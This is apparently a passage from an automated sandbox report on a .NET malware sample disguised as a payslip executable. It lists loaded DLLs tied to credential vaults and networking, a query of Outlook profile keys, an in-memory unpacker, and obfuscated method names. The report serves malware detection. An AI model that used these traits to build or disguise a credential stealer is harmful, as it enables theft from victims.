                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: Payslip_October_2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Payslip_October_2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, f0FZ3tm1t5LeGCMWQS.cs.Net Code: Nl7f1pCxTT System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, f0FZ3tm1t5LeGCMWQS.cs.Net Code: Nl7f1pCxTT System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payslip_October_2024.exe.76f0000.5.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, f0FZ3tm1t5LeGCMWQS.cs.Net Code: Nl7f1pCxTT System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payslip_October_2024.exe.3ea88f8.3.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payslip_October_2024.exe.3e888d8.4.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 2_2_00C70C55 push edi; retf 2_2_00C70C7A
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 2_2_04FB2347 push ebp; ret 2_2_04FB2348
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 2_2_0562ECB0 push es; ret 2_2_0562ECC0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_0298F7C8 pushad ; retf 5_2_0298F7D1
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_00FEF7C8 pushad ; retf 8_2_00FEF7D1
                    Source: Payslip_October_2024.exeStatic PE information: section name: .text entropy: 7.734734914632359
                    Source: sgxIb.exe.2.drStatic PE information: section name: .text entropy: 7.734734914632359
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, jISFqKQcEGnl9VxDF7c.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WiwS55lptS', 'HJfS00gDFL', 'qr8Sq7ujnT', 'sf2SB9NsLk', 'Y8NSxAhE9x', 'dorSjWIIoC', 'bdtSahyECY'
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, HN6XVpWTft3o9XfQII.csHigh entropy of concatenated method names: 'U2sv9irhfq', 'bOrvKW2KdL', 'p6sv1kmK83', 'raav4JOUjr', 'QnhvLJ5I8r', 'EA3vZWFKVe', 'eTKvYaFa36', 'SLFvRY5Urc', 'coyvPN6bav', 'xq6v72sKyN'
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, NQPnxCfo1CRN0qghcA.csHigh entropy of concatenated method names: 'fVhU43aet3', 'hn6UZSnluS', 'vS1UR7iBWS', 'H4HUPYIHuN', 'UKmUp2Px2y', 'L2xUIFNosM', 'KbvUhU2Lxk', 'YsWUwYZS8C', 'Ef0Uk8CT64', 'DpOUSh2AKN'
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, Rfvy73RNcDOBpBaxNd.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'xdNWytBhVT', 'ypIWdVWdb3', 'UIdWzTCAvW', 'gnMoFBagO1', 'A7toC6Tayh', 'F7joWip5vx', 'U1eooQ4AkJ', 'fnAwAp2g2cnDhnxDtEj'
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, DgUsN990etBSRMLxhH.csHigh entropy of concatenated method names: 'a7HCv8qHCN', 'oXQCcB0S6p', 'V3uCVSXCw1', 'LVeC6FitA9', 'tCACpfKmwE', 'l4nCIjkxDO', 'fu2Y81DmBbjh2ZseTt', 'jlWdZTnsiFfp0kPRm3', 'FDOCCtdETx', 'uj5CoF8pwS'
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, sVKoWRX5WMDJnH7n58.csHigh entropy of concatenated method names: 'Dispose', 'sF9CyBoEqo', 'RbHWGQ5VtT', 'rlObbOZZEe', 'qgACdOB0tE', 'HrdCzMKnNF', 'ProcessDialogKey', 'ci1WFEcKgT', 'xy6WCKHPFI', 'LtWWW3TaFh'
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, sSWcByxnZSUy4blmvn.csHigh entropy of concatenated method names: 'QdxuL0P6sO', 'v50uY6Z1sW', 'skRUAR3hbf', 'GgOUeGB2Je', 'CdoUHXMvEB', 'qPxUDhHxpQ', 'JEUUNvWUw4', 'PkmUXPZP8p', 'eXOUrhNb0R', 'xCDU38tEfK'
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, MFjli4i26IqfK4LJyO.csHigh entropy of concatenated method names: 'LTDw8bpp3y', 'EfOwGHWPZv', 'YN3wA5U0B1', 'b9hwe37Ofb', 'GAFw5tiub3', 'tGjwHX5SiQ', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, sUNrtITWEK7M5KbaEr.csHigh entropy of concatenated method names: 'AgDwJNr5UJ', 'x49wEJMcIk', 'xIrwUQ1e6l', 'gqiwuNx0U9', 'DjiwOa3pwh', 'yS2wvlI4wZ', 'VHiwcCDu3N', 'Cl0wMoUj0D', 'TJcwVckcmL', 'Bgdw6cQaob'
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, x2vbuUlZycmUohNT1t.csHigh entropy of concatenated method names: 'ddrhVr4yvJ', 'Ownh6WVNbK', 'ToString', 'B2qhJXtKH7', 'DRthE4XHcc', 'kkNhUv7mQZ', 'FG3huH5SNq', 'DKHhO7I0VY', 'POIhv4LlYb', 'KCxhcUhMFS'
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, REJQY251dpiIYPqPA5.csHigh entropy of concatenated method names: 'ToString', 'HN9IThy04Z', 'jBqIGiaXn4', 'wRoIA6EbYu', 'qIEIeQmCjd', 'PXXIH9XGGQ', 'SA3ID0Fsd5', 'Hn3INKyw79', 'RNwIXaUwvq', 'mCuIreFSxi'
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, ABEcdmQVHbnUnAcSWbO.csHigh entropy of concatenated method names: 'shZk9AAxrY', 'CnPkKpEE7l', 'Tudk1dYBg6', 'iAtk45ibvy', 'XNokLm718B', 'hANkZEhElZ', 'yEWkYacEBJ', 'EVskRpkKau', 'K0hkPGUGl3', 'VuAk7FAf4x'
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, Wdqh4YHsV3Mn1INqWs.csHigh entropy of concatenated method names: 'XCfkCpFMfd', 'WpJko2vsBc', 'QdWkfNVm6R', 'FMrkJgo9s2', 'J2RkEMSbiB', 'IZukuvMEUk', 'PB7kOMiWAt', 'O5Xwai4RgU', 'kTmw2adCrb', 'iVawy3JN8T'
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, agoGtyndP1pwLYdQa9.csHigh entropy of concatenated method names: 'M8MsRiptO5', 'sfTsP1QcVP', 'B8ys8f34DM', 'zwxsGy77mI', 'gSnsedIDJ3', 'Ma8sHRjHik', 'DQAsNMQXMD', 'g1NsX6dQi1', 'uxZs33b1th', 'meIsTWFmEi'
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, f0FZ3tm1t5LeGCMWQS.csHigh entropy of concatenated method names: 'gIUogv3WcE', 'LP1oJ0Q3VT', 'cDcoEsfxM1', 'EDToU5AXy5', 'Yexou9oOKO', 'l6qoOWTad0', 'LPBovlEaQO', 'VvWoc4MV4q', 'wQHoMSU6HD', 'iuFoVZxN2L'
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, Fm7q2vj6F9GunoTToo.csHigh entropy of concatenated method names: 'jF3shtIp5LHhSfMyud7', 'BcPuRaIMuFV8hgidAve', 'Eq1Owaj3wm', 'Jl0OkeHJZy', 'tNpOSSNUCT', 'ssDARfIuvZuga5loN99', 'ClF97HIy2gg5vmWlZK4', 'xOZIQPIONnHnPDUaI9R'
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, eEeKH8J1F80vEqjkp3.csHigh entropy of concatenated method names: 'YtKp3YAb0v', 'kECpllihCr', 'vGfp5kuFVi', 'YK6p0cnK2D', 'OqmpGSg1W8', 'uJkpAxDLNB', 'vFipevduUj', 'aJlpHTrhhw', 'bM1pDrLTx1', 'F0ipN73VkK'
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, UcjqhEsE3U81Clq3ih.csHigh entropy of concatenated method names: 'fLmh2VXB11', 'E7UhdKDUbk', 'XXkwFnU5T9', 'ecKwCMifNV', 'HHchTwjhkL', 'iMlhlxOtDR', 'yw5ht1LpiF', 'sykh5BIFec', 'sWmh09qCBP', 'V9XhqHRDDQ'
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, HOlZdbzCMMJ2SOspob.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cf4ksxMoOL', 'NLikpPM6Te', 'QDQkIpdjXv', 'CXNkh9mOfL', 'A8ckwke9Fv', 'hu9kk8cYVB', 'A4ekSZYbRM'
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, Fa89rlUO37apgMnjGO.csHigh entropy of concatenated method names: 'MkhOgeUyxm', 'OO5OEFP16t', 'fuWOuIDnDK', 'KokOvUf8lS', 'JyXOcf1jaU', 'gTcuxceDkn', 'cbRujwgdVq', 'aWXuaPiiTW', 'Taiu2BjGM0', 'LvLuyOHfpC'
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, JtgxviEHqAVBfiVUqo.csHigh entropy of concatenated method names: 'sZEE5lR5aX', 'dfSE08uubG', 'dVlEqM3KVs', 'OxOEBhbNZh', 'IFREx7G5kZ', 'hvPEj0G5uS', 'nioEaTQVDD', 'qPDE2k5qI5', 'wVAEyWKAvu', 'uBdEdn78T1'
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, Ch05sqFX3Aubk9xB4p.csHigh entropy of concatenated method names: 'FCc1u6lI3', 'QFw4hknU2', 'KFBZKVvLI', 'ckVY9de2D', 'Hb7Pl8pNH', 'yba73nt1Q', 'E4m05K9cv3cxpnJic0', 'TblDBx4OV4fuxbSZTR', 'iXEwU8hZ0', 'trjSu4ytp'
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, jISFqKQcEGnl9VxDF7c.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WiwS55lptS', 'HJfS00gDFL', 'qr8Sq7ujnT', 'sf2SB9NsLk', 'Y8NSxAhE9x', 'dorSjWIIoC', 'bdtSahyECY'
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, HN6XVpWTft3o9XfQII.csHigh entropy of concatenated method names: 'U2sv9irhfq', 'bOrvKW2KdL', 'p6sv1kmK83', 'raav4JOUjr', 'QnhvLJ5I8r', 'EA3vZWFKVe', 'eTKvYaFa36', 'SLFvRY5Urc', 'coyvPN6bav', 'xq6v72sKyN'
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, NQPnxCfo1CRN0qghcA.csHigh entropy of concatenated method names: 'fVhU43aet3', 'hn6UZSnluS', 'vS1UR7iBWS', 'H4HUPYIHuN', 'UKmUp2Px2y', 'L2xUIFNosM', 'KbvUhU2Lxk', 'YsWUwYZS8C', 'Ef0Uk8CT64', 'DpOUSh2AKN'
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, Rfvy73RNcDOBpBaxNd.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'xdNWytBhVT', 'ypIWdVWdb3', 'UIdWzTCAvW', 'gnMoFBagO1', 'A7toC6Tayh', 'F7joWip5vx', 'U1eooQ4AkJ', 'fnAwAp2g2cnDhnxDtEj'
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, DgUsN990etBSRMLxhH.csHigh entropy of concatenated method names: 'a7HCv8qHCN', 'oXQCcB0S6p', 'V3uCVSXCw1', 'LVeC6FitA9', 'tCACpfKmwE', 'l4nCIjkxDO', 'fu2Y81DmBbjh2ZseTt', 'jlWdZTnsiFfp0kPRm3', 'FDOCCtdETx', 'uj5CoF8pwS'
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, sVKoWRX5WMDJnH7n58.csHigh entropy of concatenated method names: 'Dispose', 'sF9CyBoEqo', 'RbHWGQ5VtT', 'rlObbOZZEe', 'qgACdOB0tE', 'HrdCzMKnNF', 'ProcessDialogKey', 'ci1WFEcKgT', 'xy6WCKHPFI', 'LtWWW3TaFh'
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, sSWcByxnZSUy4blmvn.csHigh entropy of concatenated method names: 'QdxuL0P6sO', 'v50uY6Z1sW', 'skRUAR3hbf', 'GgOUeGB2Je', 'CdoUHXMvEB', 'qPxUDhHxpQ', 'JEUUNvWUw4', 'PkmUXPZP8p', 'eXOUrhNb0R', 'xCDU38tEfK'
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, MFjli4i26IqfK4LJyO.csHigh entropy of concatenated method names: 'LTDw8bpp3y', 'EfOwGHWPZv', 'YN3wA5U0B1', 'b9hwe37Ofb', 'GAFw5tiub3', 'tGjwHX5SiQ', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, sUNrtITWEK7M5KbaEr.csHigh entropy of concatenated method names: 'AgDwJNr5UJ', 'x49wEJMcIk', 'xIrwUQ1e6l', 'gqiwuNx0U9', 'DjiwOa3pwh', 'yS2wvlI4wZ', 'VHiwcCDu3N', 'Cl0wMoUj0D', 'TJcwVckcmL', 'Bgdw6cQaob'
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, x2vbuUlZycmUohNT1t.csHigh entropy of concatenated method names: 'ddrhVr4yvJ', 'Ownh6WVNbK', 'ToString', 'B2qhJXtKH7', 'DRthE4XHcc', 'kkNhUv7mQZ', 'FG3huH5SNq', 'DKHhO7I0VY', 'POIhv4LlYb', 'KCxhcUhMFS'
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, REJQY251dpiIYPqPA5.csHigh entropy of concatenated method names: 'ToString', 'HN9IThy04Z', 'jBqIGiaXn4', 'wRoIA6EbYu', 'qIEIeQmCjd', 'PXXIH9XGGQ', 'SA3ID0Fsd5', 'Hn3INKyw79', 'RNwIXaUwvq', 'mCuIreFSxi'
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, ABEcdmQVHbnUnAcSWbO.csHigh entropy of concatenated method names: 'shZk9AAxrY', 'CnPkKpEE7l', 'Tudk1dYBg6', 'iAtk45ibvy', 'XNokLm718B', 'hANkZEhElZ', 'yEWkYacEBJ', 'EVskRpkKau', 'K0hkPGUGl3', 'VuAk7FAf4x'
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, Wdqh4YHsV3Mn1INqWs.csHigh entropy of concatenated method names: 'XCfkCpFMfd', 'WpJko2vsBc', 'QdWkfNVm6R', 'FMrkJgo9s2', 'J2RkEMSbiB', 'IZukuvMEUk', 'PB7kOMiWAt', 'O5Xwai4RgU', 'kTmw2adCrb', 'iVawy3JN8T'
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, agoGtyndP1pwLYdQa9.csHigh entropy of concatenated method names: 'M8MsRiptO5', 'sfTsP1QcVP', 'B8ys8f34DM', 'zwxsGy77mI', 'gSnsedIDJ3', 'Ma8sHRjHik', 'DQAsNMQXMD', 'g1NsX6dQi1', 'uxZs33b1th', 'meIsTWFmEi'
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, f0FZ3tm1t5LeGCMWQS.csHigh entropy of concatenated method names: 'gIUogv3WcE', 'LP1oJ0Q3VT', 'cDcoEsfxM1', 'EDToU5AXy5', 'Yexou9oOKO', 'l6qoOWTad0', 'LPBovlEaQO', 'VvWoc4MV4q', 'wQHoMSU6HD', 'iuFoVZxN2L'
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, Fm7q2vj6F9GunoTToo.csHigh entropy of concatenated method names: 'jF3shtIp5LHhSfMyud7', 'BcPuRaIMuFV8hgidAve', 'Eq1Owaj3wm', 'Jl0OkeHJZy', 'tNpOSSNUCT', 'ssDARfIuvZuga5loN99', 'ClF97HIy2gg5vmWlZK4', 'xOZIQPIONnHnPDUaI9R'
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, eEeKH8J1F80vEqjkp3.csHigh entropy of concatenated method names: 'YtKp3YAb0v', 'kECpllihCr', 'vGfp5kuFVi', 'YK6p0cnK2D', 'OqmpGSg1W8', 'uJkpAxDLNB', 'vFipevduUj', 'aJlpHTrhhw', 'bM1pDrLTx1', 'F0ipN73VkK'
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, UcjqhEsE3U81Clq3ih.csHigh entropy of concatenated method names: 'fLmh2VXB11', 'E7UhdKDUbk', 'XXkwFnU5T9', 'ecKwCMifNV', 'HHchTwjhkL', 'iMlhlxOtDR', 'yw5ht1LpiF', 'sykh5BIFec', 'sWmh09qCBP', 'V9XhqHRDDQ'
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, HOlZdbzCMMJ2SOspob.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cf4ksxMoOL', 'NLikpPM6Te', 'QDQkIpdjXv', 'CXNkh9mOfL', 'A8ckwke9Fv', 'hu9kk8cYVB', 'A4ekSZYbRM'
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, Fa89rlUO37apgMnjGO.csHigh entropy of concatenated method names: 'MkhOgeUyxm', 'OO5OEFP16t', 'fuWOuIDnDK', 'KokOvUf8lS', 'JyXOcf1jaU', 'gTcuxceDkn', 'cbRujwgdVq', 'aWXuaPiiTW', 'Taiu2BjGM0', 'LvLuyOHfpC'
